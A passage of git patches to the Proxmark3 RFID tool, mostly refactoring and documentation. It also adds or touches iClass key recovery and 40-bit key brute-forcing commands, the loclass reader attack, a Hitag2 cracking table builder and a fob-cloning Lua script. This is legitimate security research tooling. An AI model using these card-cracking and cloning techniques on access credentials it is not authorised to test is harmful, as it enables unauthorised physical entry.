DbpString(_YELLOW_("Restoring Card to the original key using Reset Key: ")); + Dbhexdump(8, resetkey, false); if (iclass_writeblock_ext(blockno, resetkey, mac2, use_mac, shallow_mod)) { - Dbprintf("Restore of Original Key [%3d/0x%02X] " _GREEN_("successful"), blockno, blockno); + Dbprintf("Restore of Original Key "_GREEN_("successful. Card is usable again.")); } else { - Dbprintf("Restore of Original Key [%3d/0x%02X] " _RED_("failed"), blockno, blockno); + Dbprintf("Restore of Original Key " _RED_("failed. Card is likely unusable.")); } + //Print the 24 bits found from k1 + DbpString(_YELLOW_("Raw Key Partial Bytes: ")); + Dbhexdump(8, partialkey, false); switch_off(); + reply_ng(CMD_HF_ICLASS_RECOVER, PM3_SUCCESS, NULL, 0); out: switch_off(); - + reply_ng(CMD_HF_ICLASS_RECOVER, PM3_ESOFT, NULL, 0); } \ No newline at end of file diff --git a/armsrc/util.c b/armsrc/util.c index a4d6f2b8b..939272cac 100644 --- a/armsrc/util.c +++ b/armsrc/util.c @@ -396,32 +396,22 @@ uint32_t get_flash_size(void) { return flash_size_from_cidr(*AT91C_DBGU_CIDR); } -// Function to convert an unsigned int to binary string -void intToBinary(uint8_t num, char *binaryStr, int size) { - binaryStr[size] = '\0'; // Null-terminate the string - for (int i = size - 1; i >= 0; i--) { +// Combined function to convert an unsigned int to an array of hex values corresponding to the last three bits of k1 +void convertToHexArray(uint8_t num, uint8_t *partialkey) { + char binaryStr[25]; // 24 bits for binary representation + 1 for null terminator + binaryStr[24] = '\0'; // Null-terminate the string + + // Convert the number to binary string + for (int i = 23; i >= 0; i--) { binaryStr[i] = (num % 2) ? '1' : '0'; num /= 2; } -} - -// Function to convert a binary string to hexadecimal -uint8_t binaryToHex(char *binaryStr) { - return (uint8_t)strtoul(binaryStr, NULL, 2); -} - -// Function to convert an unsigned int to an array of hex values -void convertToHexArray(uint8_t num, uint8_t *partialkey) { - char binaryStr[25]; // 24 bits for binary representation + 1 for null terminator - - // Convert the number to binary string - intToBinary(num, binaryStr, 24); // Split the binary string into groups of 3 and convert to hex for (int i = 0; i < 8 ; i++) { char group[4]; strncpy(group, binaryStr + i * 3, 3); group[3] = '\0'; // Null-terminate the group string - partialkey[i] = binaryToHex(group); + partialkey[i] = (uint8_t)strtoul(group, NULL, 2); } } \ No newline at end of file diff --git a/armsrc/util.h b/armsrc/util.h index 709c11c3e..fac928427 100644 --- a/armsrc/util.h +++ b/armsrc/util.h @@ -88,8 +88,6 @@ int hex2binarray(char *target, char *source); int hex2binarray_n(char *target, const char *source, int sourcelen); int binarray2hex(const uint8_t *bs, int bs_len, uint8_t *hex); -void intToBinary(uint8_t num, char *binaryStr, int size); -uint8_t binaryToHex(char *binaryStr); void convertToHexArray(uint8_t num, uint8_t *partialKey); void LED(int led, int ms); diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index 03d66f797..6adeddc8d 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -3874,9 +3874,9 @@ static int CmdHFiClassRecover(uint8_t key[8]) { WaitForResponse(CMD_HF_ICLASS_RECOVER, &resp); if (resp.status == PM3_SUCCESS) { - PrintAndLogEx(SUCCESS, "iCLASS Recover " _GREEN_("successful")); + PrintAndLogEx(SUCCESS, "iCLASS Key Bits Recovery " _GREEN_("successful")); } else { - PrintAndLogEx(WARNING, "iCLASS Recover " _RED_("failed")); + PrintAndLogEx(WARNING, "iCLASS Key Bits Recovery " _RED_("failed")); } free(payload); From 5effb4f8866f92f83d4dbf7bf79b3eaceea9e245 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sun, 21 Jul 2024 11:09:43 +0200 Subject: [PATCH 107/112] added dorma kaba mobile wallet AID --- client/resources/aid_desfire.json | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 655aeadc0..ac1b035bb 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -991,6 +991,14 @@ "Description": "UK National Smartcard Project // Provision of Citizen Services #4", "Type": "transport" }, + { + "AID": "F53280", + "Vendor": "Dorma Kaba", + "Country": "CH", + "Name": "Mobile wallet", + "Description": "Dorma kaba mobile access", + "Type": "pacs" + }, { "AID": "FF30FF", "Vendor": "Metrolinx", From 791d9e09ac81cb2da06ec4c5eb3b957db136774d Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sun, 21 Jul 2024 11:37:47 +0200 Subject: [PATCH 108/112] write check wrong, write returns number of bytes written, hence always larger than 0. Thanks to @mwalker33 for the fix --- tools/hitag2crack/crack2/ht2crack2buildtable.c | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/tools/hitag2crack/crack2/ht2crack2buildtable.c b/tools/hitag2crack/crack2/ht2crack2buildtable.c index 29d8987d0..625a0f175 100644 --- a/tools/hitag2crack/crack2/ht2crack2buildtable.c +++ b/tools/hitag2crack/crack2/ht2crack2buildtable.c @@ -430,7 +430,7 @@ static void *sorttable(void *dd) { printf("cannot create outfile %s\n", outfile); exit(1); } - if (write(fdout, table, numentries * DATASIZE)) { + if (write(fdout, table, numentries * DATASIZE) != (numentries * DATASIZE)) { printf("writetable cannot write all of the data\n"); exit(1); } @@ -454,7 +454,7 @@ int main(int argc, char *argv[]) { // make the table of tables t = (struct table *)calloc(sizeof(struct table) * 65536, sizeof(uint8_t)); if (!t) { - printf("malloc failed\n"); + printf("calloc failed\n"); exit(1); } @@ -503,11 +503,8 @@ int main(int argc, char *argv[]) { free_tables(t); free(t); - - // now for the sorting - // start the threads for (long i = 0; i < NUM_SORT_THREADS; i++) { int ret = pthread_create(&(threads[i]), NULL, sorttable, (void *)(i)); From 2887cb52110a3dfb5a692741b6e83278360628e3 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sun, 21 Jul 2024 16:13:00 +0200 Subject: [PATCH 109/112] text --- client/src/cmdlfem4x50.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/src/cmdlfem4x50.c b/client/src/cmdlfem4x50.c index 0e610298f..9993243f4 100644 --- a/client/src/cmdlfem4x50.c +++ b/client/src/cmdlfem4x50.c @@ -974,7 +974,7 @@ static int CmdEM4x50Write(const char *Cmd) { em4x50_prepare_result(data, addr, addr, words); em4x50_print_result(words, addr, addr); PrintAndLogEx(SUCCESS, "Write ( " _GREEN_("ok") " )"); - PrintAndLogEx(HINT, "Try `" _YELLOW_("lf em 4x50 rdbl -a %u") "` - to read your data", addr); + PrintAndLogEx(HINT, "Try `" _YELLOW_("lf em 4x50 rdbl -b %u") "` - to read your data", addr); PrintAndLogEx(INFO, "Done!"); return PM3_SUCCESS; } From 4de7b7d6b9275e8302c63760a358e9ad4ca6d763 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sun, 21 Jul 2024 16:19:21 +0200 Subject: [PATCH 110/112] style --- armsrc/Standalone/lf_em4100emul.c | 2 +- armsrc/iclass.c | 18 +++++----- armsrc/util.c | 2 +- client/luascripts/lf_electra.lua | 30 ++++++++--------- client/pyscripts/intertic.py | 28 ++++++++-------- client/src/cmdhficlass.c | 28 ++++++++-------- client/src/cmdhficlass.h | 2 +- client/src/pm3line_vocabulary.h | 2 ++ doc/commands.json | 55 ++++++++++++++++++++++++------- doc/commands.md | 2 ++ 10 files changed, 103 insertions(+), 66 deletions(-) diff --git a/armsrc/Standalone/lf_em4100emul.c b/armsrc/Standalone/lf_em4100emul.c index 324d541bb..b9244c59a 100644 --- a/armsrc/Standalone/lf_em4100emul.c +++ b/armsrc/Standalone/lf_em4100emul.c @@ -119,7 +119,7 @@ void RunMod(void) { LEDsoff(); Dbprintf("[=] >> LF EM4100 simulator stopped due to button hold <<"); return; // RunMod end - } + } selected = (selected + 1) % em4100emul_slots_count; } } diff --git a/armsrc/iclass.c b/armsrc/iclass.c index 109b03d8d..5fa1bfc25 100644 --- a/armsrc/iclass.c +++ b/armsrc/iclass.c @@ -2242,17 +2242,17 @@ void iClass_Recover(iclass_recover_req_t *msg) { //Viewing the weak macs table card 24 bits (3x8) in the form of a 24 bit decimal number static uint32_t iclass_mac_table_bit_values[8] = {0, 2396745, 4793490, 7190235, 9586980, 11983725, 14380470, 16777215}; -/* iclass_mac_table is a series of weak macs, those weak macs correspond to the different combinations of the last 3 bits of each key byte. -If we concatenate the last three bits of each key byte, we have a 24 bits long binary string. -If we convert that string to decimal we obtain the decimal numbers in iclass_mac_table_bit_values -Xorring the index of iterations against those decimal numbers allows us to retrieve the what was the corresponding sequence of bits of the original key in decimal format. */ + /* iclass_mac_table is a series of weak macs, those weak macs correspond to the different combinations of the last 3 bits of each key byte. + If we concatenate the last three bits of each key byte, we have a 24 bits long binary string. + If we convert that string to decimal we obtain the decimal numbers in iclass_mac_table_bit_values + Xorring the index of iterations against those decimal numbers allows us to retrieve the what was the corresponding sequence of bits of the original key in decimal format. */ uint8_t zero_key[PICOPASS_BLOCK_SIZE] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; uint32_t index = 1; int bits_found = -1; //START LOOP - while (bits_found == -1){ + while (bits_found == -1) { //Step3 Calculate New Key uint8_t genkeyblock[PICOPASS_BLOCK_SIZE]; @@ -2262,12 +2262,12 @@ Xorring the index of iterations against those decimal numbers allows us to retri //NOTE BEFORE UPDATING THE KEY WE NEED TO KEEP IN MIND KEYS ARE XORRED //xor the new key against the previously generated key so that we only update the difference - if(index != 0){ + if (index != 0) { generate_single_key_block_inverted(zero_key, index - 1, genkeyblock_old); for (int i = 0; i < 8 ; i++) { xorkeyblock[i] = genkeyblock[i] ^ genkeyblock_old[i]; } - }else{ + } else { memcpy(xorkeyblock, genkeyblock, PICOPASS_BLOCK_SIZE); } @@ -2289,7 +2289,7 @@ Xorring the index of iterations against those decimal numbers allows us to retri Dbprintf("Write block [%3d/0x%02X] " _GREEN_("successful"), blockno, blockno); } else { Dbprintf("Write block [%3d/0x%02X] " _RED_("failed"), blockno, blockno); - if (index > 1){ + if (index > 1) { Dbprintf(_RED_("Card is likely to be unusable!")); } goto out; @@ -2349,4 +2349,4 @@ out: switch_off(); reply_ng(CMD_HF_ICLASS_RECOVER, PM3_ESOFT, NULL, 0); -} \ No newline at end of file +} diff --git a/armsrc/util.c b/armsrc/util.c index 939272cac..446e10ee0 100644 --- a/armsrc/util.c +++ b/armsrc/util.c @@ -414,4 +414,4 @@ void convertToHexArray(uint8_t num, uint8_t *partialkey) { group[3] = '\0'; // Null-terminate the group string partialkey[i] = (uint8_t)strtoul(group, NULL, 2); } -} \ No newline at end of file +} diff --git a/client/luascripts/lf_electra.lua b/client/luascripts/lf_electra.lua index 38b6e6e64..526ed9460 100644 --- a/client/luascripts/lf_electra.lua +++ b/client/luascripts/lf_electra.lua @@ -8,33 +8,33 @@ mod = " ELECTRA or EM410x fob cloning SCRIPT " version = " v1.1.17 02/09/2023 made by jareckib " desc = [[ - Cloning new ELECTRA tags or EM410x to T5577 tag. This script changes - block 0. Additional data is written to block 3 and 4. The last - ELECTRA ID can be accessed through the option ---> "-c". For copy - directly from the original ELECTRA tag, ---> option "-e". For copy - from input, EM410X ID ---> option "-s". Next option for cloning simple - EM4102 ---> option "-m". If press it, which writes an ID. + Cloning new ELECTRA tags or EM410x to T5577 tag. This script changes + block 0. Additional data is written to block 3 and 4. The last + ELECTRA ID can be accessed through the option ---> "-c". For copy + directly from the original ELECTRA tag, ---> option "-e". For copy + from input, EM410X ID ---> option "-s". Next option for cloning simple + EM4102 ---> option "-m". If press it, which writes an ID. If press ---> exit the script. ]] example = [[ ------------------------------------------------------------------------------- --------------- cloning ELECTRA tag from input ID to T5577 tag ---------------- - + script run lf_electra -s 11AA22BB55 ------------------ continue cloning from last cloned ELECTRA ------------------- - +----------------- continue cloning from last cloned ELECTRA ------------------- + script run lf_electra -c - + ---------------------- ELECTRA cloning from the original TAG ----------------- - + script run lf_electra -e ------------------------------ simple EM4102 cloning --------------------------- - +----------------------------- simple EM4102 cloning --------------------------- + script run lf_electra -m - + ------------------------------------------------------------------------------- ]] usage = [[ @@ -212,7 +212,7 @@ local function main(args) if o == 'c' then saved_id = true end end --------------------check -id - if not saved_id and not id_original and not emarine then + if not saved_id and not id_original and not emarine then if input_id == nil then return oops(' empty EM410x ID string') end if #input_id == 0 then return oops(' empty EM410x ID string') end if #input_id < 10 then return oops(' EM410x ID too short. Must be 5 hex bytes') end diff --git a/client/pyscripts/intertic.py b/client/pyscripts/intertic.py index fdb5ff081..c0b017d73 100644 --- a/client/pyscripts/intertic.py +++ b/client/pyscripts/intertic.py @@ -89,7 +89,7 @@ def Describe_Usage_1(Usage, ContractMediumEndDate, Certificate): EventTimeStamp = Usage.nom(11) unk = Usage.nom_bits(65) EventValidityTimeFirstStamp = Usage.nom(11) - + print(' EventDateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) print(' unk1... :', unk); @@ -109,7 +109,7 @@ def Describe_Usage_1_1(Usage, ContractMediumEndDate, Certificate): EventGeoRoute_Direction = Usage.nom(2) EventCountPassengers_mb = Usage.nom(4) EventValidityTimeFirstStamp = Usage.nom(11) - + print(' DateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); print(' TimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) print(' unk0... :', unk0); @@ -137,12 +137,12 @@ def Describe_Usage_1_2(Usage, ContractMediumEndDate, Certificate): EventGeoRoute_Direction = Usage.nom(2) EventCountPassengers_mb = Usage.nom(4) EventValidityTimeFirstStamp = Usage.nom(11) - + TYPE_EventCode_Nature_Reims = { # usually it's the opposite, but ... ? 0x4: 'urban bus', 0x1: 'tramway', } - + print(' DateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); print(' TimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) print(' Count(?) : {}'. format(EventCount_mb)) @@ -170,7 +170,7 @@ def Describe_Usage_2(Usage, ContractMediumEndDate, Certificate): EventGeoRoute_Direction = Usage.nom(2) EventCountPassengers_mb = Usage.nom(4) EventValidityTimeFirstStamp = Usage.nom(11) - + print(' DateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); print(' TimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) print(' unk0... :', unk0); @@ -183,26 +183,26 @@ def Describe_Usage_2(Usage, ContractMediumEndDate, Certificate): print(' ValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) print(' left... :', Usage.nom_bits_left()); print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) - + def Describe_Usage_3(Usage, ContractMediumEndDate, Certificate): EventDateStamp = Usage.nom(10) EventTimeStamp = Usage.nom(11) unk = Usage.nom_bits(27) EventValidityTimeFirstStamp = Usage.nom(11) - + print(' EventDateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) print(' unk1... :', unk); print(' EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) print(' left... :', Usage.nom_bits_left()); print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) - + def Describe_Usage_4(Usage, ContractMediumEndDate, Certificate): EventDateStamp = Usage.nom(10) EventTimeStamp = Usage.nom(11) unk = Usage.nom_bits(63) EventValidityTimeFirstStamp = Usage.nom(11) - + print(' EventDateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) print(' unk1... :', unk); @@ -311,7 +311,7 @@ def main(): if not chunk: break data.addBytes(chunk[::-1]) - + file.close() Distribution_Data = BitMe() @@ -336,7 +336,7 @@ def main(): PID = data.nom(5) match PID: - + case 0x10: Distribution_Data.addBits(data.nom_bits(2 * 32)) Distribution_Data.addBits(Block0Left.nom_bits_left()) @@ -365,7 +365,7 @@ def main(): Usage_B_DAT.addBits(data.nom_bits(16)) Usage_B_CER.addBits(data.nom_bits(16)) Distribution_Cer.addBits(data.nom_bits(32)) - + case _: print('PID not (yet?) supported: 0x{:02x}'.format(PID)) return 3 @@ -413,7 +413,7 @@ def main(): if(Describe_Usage is None): Describe_Usage = Describe_Usage_Generic - + if COUNTER1 is not None: print('[1] Counter: 0x{:06x} - Reloading available: 0x{:02x}'.format(COUNTER1, RELOADING1)) # if COUNTER2 is not None: @@ -433,7 +433,7 @@ def main(): print() print('USAGE_A') Describe_Usage(Usage_A_DAT, ContractMediumEndDate, Usage_A_CER) - + if not Usage_B_DAT.isEmpty(): print() print('USAGE_B') diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index 6adeddc8d..7af8d69b6 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -3601,9 +3601,9 @@ static int CmdHFiClassCheckKeys(const char *Cmd) { bool use_vb6kdf = arg_get_lit(ctx, 6); bool use_elite = arg_get_lit(ctx, 3); bool use_raw = arg_get_lit(ctx, 4); - if(use_vb6kdf){ + if (use_vb6kdf) { use_elite = true; - }else{ + } else { CLIParamStrToBuf(arg_get_str(ctx, 1), (uint8_t *)filename, FILE_PATH_SIZE, &fnlen); } @@ -3827,14 +3827,14 @@ uint8_t picopass_elite_nextByte(void) { return (picopass_elite_rng() >> 16) & 0xFF; } -void picopass_elite_nextKey(uint8_t* key) { - if(prepared) { - for(size_t i = 0; i < 7; i++) { +void picopass_elite_nextKey(uint8_t *key) { + if (prepared) { + for (size_t i = 0; i < 7; i++) { key_state[i] = key_state[i + 1]; } key_state[7] = picopass_elite_nextByte(); } else { - for(size_t i = 0; i < 8; i++) { + for (size_t i = 0; i < 8; i++) { key_state[i] = picopass_elite_nextByte(); } prepared = true; @@ -4086,14 +4086,14 @@ static int CmdHFiClassLegacyRecover(const char *Cmd) { CLIParserContext *ctx; CLIParserInit(&ctx, "hf iclass legrec", - "Attempts to recover the diversified key of a specific iClass card. This may take a long time. The Card must remain be on the PM3 antenna during the whole process! This process may brick the card!", - "hf iclass legrec --macs 0000000089cb984b" - ); + "Attempts to recover the diversified key of a specific iClass card. This may take a long time. The Card must remain be on the PM3 antenna during the whole process! This process may brick the card!", + "hf iclass legrec --macs 0000000089cb984b" + ); void *argtable[] = { - arg_param_begin, - arg_str1(NULL, "macs", "", "MACs"), - arg_param_end + arg_param_begin, + arg_str1(NULL, "macs", "", "MACs"), + arg_param_end }; CLIExecWithReturn(ctx, Cmd, argtable, false); @@ -4148,9 +4148,9 @@ static int CmdHFiClassLookUp(const char *Cmd) { bool use_elite = arg_get_lit(ctx, 5); bool use_raw = arg_get_lit(ctx, 6); - if(use_vb6kdf){ + if (use_vb6kdf) { use_elite = true; - }else{ + } else { CLIParamStrToBuf(arg_get_str(ctx, 1), (uint8_t *)filename, FILE_PATH_SIZE, &fnlen); } diff --git a/client/src/cmdhficlass.h b/client/src/cmdhficlass.h index 5a4b20aec..2a3139059 100644 --- a/client/src/cmdhficlass.h +++ b/client/src/cmdhficlass.h @@ -37,7 +37,7 @@ void PrintPreCalc(iclass_prekey_t *list, uint32_t itemcnt); uint8_t get_pagemap(const picopass_hdr_t *hdr); bool check_known_default(uint8_t *csn, uint8_t *epurse, uint8_t *rmac, uint8_t *tmac, uint8_t *key); -void picopass_elite_nextKey(uint8_t* key); +void picopass_elite_nextKey(uint8_t *key); void picopass_elite_reset(void); uint32_t picopass_elite_rng(void); uint32_t picopass_elite_lcg(void); diff --git a/client/src/pm3line_vocabulary.h b/client/src/pm3line_vocabulary.h index 9ab543d4a..36cf4f8ff 100644 --- a/client/src/pm3line_vocabulary.h +++ b/client/src/pm3line_vocabulary.h @@ -279,6 +279,8 @@ const static vocabulary_t vocabulary[] = { { 0, "hf iclass chk" }, { 1, "hf iclass loclass" }, { 1, "hf iclass lookup" }, + { 0, "hf iclass legrec" }, + { 1, "hf iclass legbrute" }, { 0, "hf iclass sim" }, { 0, "hf iclass eload" }, { 0, "hf iclass esave" }, diff --git a/doc/commands.json b/doc/commands.json index 90890ad22..fabb918ec 100644 --- a/doc/commands.json +++ b/doc/commands.json @@ -189,9 +189,9 @@ "options": [ "-h, --help This help", "-d ASN1 encoded byte array", - "-t, --test perform self test" + "--test perform self tests" ], - "usage": "data asn1 [-ht] [-d ]" + "usage": "data asn1 [-h] [-d ] [--test]" }, "data atr": { "command": "data atr", @@ -3163,7 +3163,8 @@ "description": "Checkkeys loads a dictionary text file with 8byte hex keys to test authenticating against a iClass tag", "notes": [ "hf iclass chk -f iclass_default_keys.dic", - "hf iclass chk -f iclass_elite_keys.dic --elite" + "hf iclass chk -f iclass_elite_keys.dic --elite", + "hf iclass chk --vb6kdf" ], "offline": false, "options": [ @@ -3172,9 +3173,10 @@ "--credit key is assumed to be the credit key", "--elite elite computations applied to key", "--raw no computations applied to key (raw)", - "--shallow use shallow (ASK) reader modulation instead of OOK" + "--shallow use shallow (ASK) reader modulation instead of OOK", + "--vb6kdf use the VB6 elite KDF instead of a file" ], - "usage": "hf iclass chk [-h] -f [--credit] [--elite] [--raw] [--shallow]" + "usage": "hf iclass chk [-h] [-f ] [--credit] [--elite] [--raw] [--shallow] [--vb6kdf]" }, "hf iclass configcard": { "command": "hf iclass configcard", @@ -3370,7 +3372,7 @@ }, "hf iclass help": { "command": "hf iclass help", - "description": "help This help list List iclass history view Display content from tag dump file ----------- --------------------- Recovery -------------------- loclass Use loclass to perform bruteforce reader attack lookup Uses authentication trace to check for key in dictionary file ----------- ---------------------- Utils ---------------------- calcnewkey Calc diversified keys (blocks 3 & 4) to write new keys encode Encode binary wiegand to block 7 encrypt Encrypt given block data decrypt Decrypt given block data or tag dump file managekeys Manage keys to use with iclass commands permutekey Permute function from 'heart of darkness' paper --------------------------------------------------------------------------------------- hf iclass list available offline: yes Alias of `trace list -t iclass -c` with selected protocol data to annotate trace buffer You can load a trace from file (see `trace load -h`) or it be downloaded from device by default It accepts all other arguments of `trace list`. Note that some might not be relevant for this specific protocol", + "description": "help This help list List iclass history view Display content from tag dump file ----------- --------------------- Recovery -------------------- loclass Use loclass to perform bruteforce reader attack lookup Uses authentication trace to check for key in dictionary file legbrute Bruteforces 40 bits of a partial raw key ----------- ---------------------- Utils ---------------------- calcnewkey Calc diversified keys (blocks 3 & 4) to write new keys encode Encode binary wiegand to block 7 encrypt Encrypt given block data decrypt Decrypt given block data or tag dump file managekeys Manage keys to use with iclass commands permutekey Permute function from 'heart of darkness' paper --------------------------------------------------------------------------------------- hf iclass list available offline: yes Alias of `trace list -t iclass -c` with selected protocol data to annotate trace buffer You can load a trace from file (see `trace load -h`) or it be downloaded from device by default It accepts all other arguments of `trace list`. Note that some might not be relevant for this specific protocol", "notes": [ "hf iclass list --frame -> show frame delay times", "hf iclass list -1 -> use trace buffer" @@ -3402,6 +3404,35 @@ ], "usage": "hf iclass info [-h] [--shallow]" }, + "hf iclass legbrute": { + "command": "hf iclass legbrute", + "description": "This command take sniffed trace data and partial raw key and bruteforces the remaining 40 bits of the raw key.", + "notes": [ + "hf iclass legbrute --csn 8D7BD711FEFF12E0 --epurse feffffffffffffff --macs 00000000BD478F76 --pk B4F12AADC5301225" + ], + "offline": true, + "options": [ + "-h, --help This help", + "--csn Specify CSN as 8 hex bytes", + "--epurse Specify ePurse as 8 hex bytes", + "--macs MACs", + "--pk Partial Key" + ], + "usage": "hf iclass legbrute [-h] --csn --epurse --macs --pk " + }, + "hf iclass legrec": { + "command": "hf iclass legrec", + "description": "Attempts to recover the diversified key of a specific iClass card. This may take a long time. The Card must remain be on the PM3 antenna during the whole process! This process may brick the card!", + "notes": [ + "hf iclass legrec --macs 0000000089cb984b" + ], + "offline": false, + "options": [ + "-h, --help This help", + "--macs MACs" + ], + "usage": "hf iclass legrec [-h] --macs " + }, "hf iclass loclass": { "command": "hf iclass loclass", "description": "Execute the offline part of loclass attack An iclass dumpfile is assumed to consist of an arbitrary number of malicious CSNs, and their protocol responses The binary format of the file is expected to be as follows: <8 byte CSN><8 byte CC><4 byte NR><4 byte MAC> <8 byte CSN><8 byte CC><4 byte NR><4 byte MAC> <8 byte CSN><8 byte CC><4 byte NR><4 byte MAC> ... totalling N*24 bytes", @@ -3423,7 +3454,8 @@ "description": "This command take sniffed trace data and try to recovery a iCLASS Standard or iCLASS Elite key.", "notes": [ "hf iclass lookup --csn 9655a400f8ff12e0 --epurse f0ffffffffffffff --macs 0000000089cb984b -f iclass_default_keys.dic", - "hf iclass lookup --csn 9655a400f8ff12e0 --epurse f0ffffffffffffff --macs 0000000089cb984b -f iclass_default_keys.dic --elite" + "hf iclass lookup --csn 9655a400f8ff12e0 --epurse f0ffffffffffffff --macs 0000000089cb984b -f iclass_default_keys.dic --elite", + "hf iclass lookup --csn 9655a400f8ff12e0 --epurse f0ffffffffffffff --macs 0000000089cb984b --vb6rng" ], "offline": true, "options": [ @@ -3433,9 +3465,10 @@ "--epurse Specify ePurse as 8 hex bytes", "--macs MACs", "--elite Elite computations applied to key", - "--raw no computations applied to key" + "--raw no computations applied to key", + "--vb6rng use the VB6 rng for elite keys instead of a dictionary file" ], - "usage": "hf iclass lookup [-h] -f --csn --epurse --macs [--elite] [--raw]" + "usage": "hf iclass lookup [-h] [-f ] --csn --epurse --macs [--elite] [--raw] [--vb6rng]" }, "hf iclass managekeys": { "command": "hf iclass managekeys", @@ -12732,8 +12765,8 @@ } }, "metadata": { - "commands_extracted": 737, + "commands_extracted": 739, "extracted_by": "PM3Help2JSON v1.00", - "extracted_on": "2024-05-27T13:38:05" + "extracted_on": "2024-07-21T14:16:40" } } diff --git a/doc/commands.md b/doc/commands.md index dd7f275a4..ed0e84766 100644 --- a/doc/commands.md +++ b/doc/commands.md @@ -402,6 +402,8 @@ Check column "offline" for their availability. |`hf iclass chk `|N |`Check keys` |`hf iclass loclass `|Y |`Use loclass to perform bruteforce reader attack` |`hf iclass lookup `|Y |`Uses authentication trace to check for key in dictionary file` +|`hf iclass legrec `|N |`Attempts to recover the standard key of a legacy card` +|`hf iclass legbrute `|Y |`Bruteforces 40 bits of a partial raw key` |`hf iclass sim `|N |`Simulate iCLASS tag` |`hf iclass eload `|N |`Upload file into emulator memory` |`hf iclass esave `|N |`Save emulator memory to file` From f8db7b185d2076e9943d80bb5b16b8be39005739 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sun, 21 Jul 2024 16:24:18 +0200 Subject: [PATCH 111/112] added support for --ns the nosave flag in hf iclass dump --- CHANGELOG.md | 4 +++- client/src/cmdhficlass.c | 15 +++++++++++---- 2 files changed, 14 insertions(+), 5 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 8bc1502ec..fd86c250a 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,7 +3,9 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] -- fixed breaking of client when trying to load a non-supported .picopass file (@iceman100) Thanks to Jump for suggested fixes! +- Changed `hf iclass dump --ns` - now supports the nosave flag (@iceman1001) +- Fixed write check in hitag2crack2 buildtables (@mwalker33) +- Fixed breaking of client when trying to load a non-supported .picopass file (@iceman100) Thanks to Jump for suggested fixes! - Changed `mf_nonce_brute` tool to handle the odd case of multiple key candidates (@iceman1001) - Fixed a bad memory erase (@iceman1001) - Fixed BT serial comms (@iceman1001) diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index 7af8d69b6..f70aebd31 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -39,6 +39,7 @@ #include "iclass_cmd.h" #include "crypto/asn1utils.h" // ASN1 decoder #include "preferences.h" +#include "generator.h" #define NUM_CSNS 9 @@ -1448,6 +1449,7 @@ static int CmdHFiClassDecrypt(const char *Cmd) { arg_lit0("v", "verbose", "verbose output"), arg_lit0(NULL, "d6", "decode as block 6"), arg_lit0("z", "dense", "dense dump output style"), + arg_lit0(NULL, "ns", "no save to file"), arg_param_end }; CLIExecWithReturn(clictx, Cmd, argtable, false); @@ -1472,6 +1474,7 @@ static int CmdHFiClassDecrypt(const char *Cmd) { bool verbose = arg_get_lit(clictx, 4); bool use_decode6 = arg_get_lit(clictx, 5); bool dense_output = g_session.dense_output || arg_get_lit(clictx, 6); + bool nosave = arg_get_lit(clictx, 7); CLIParserFree(clictx); // sanity checks @@ -1611,6 +1614,11 @@ static int CmdHFiClassDecrypt(const char *Cmd) { } } + if (nosave) { + PrintAndLogEx(INFO, "Called with no save option"); + PrintAndLogEx(NORMAL, ""); + } else { + // use the first block (CSN) for filename char *fptr = calloc(50, sizeof(uint8_t)); if (fptr == false) { @@ 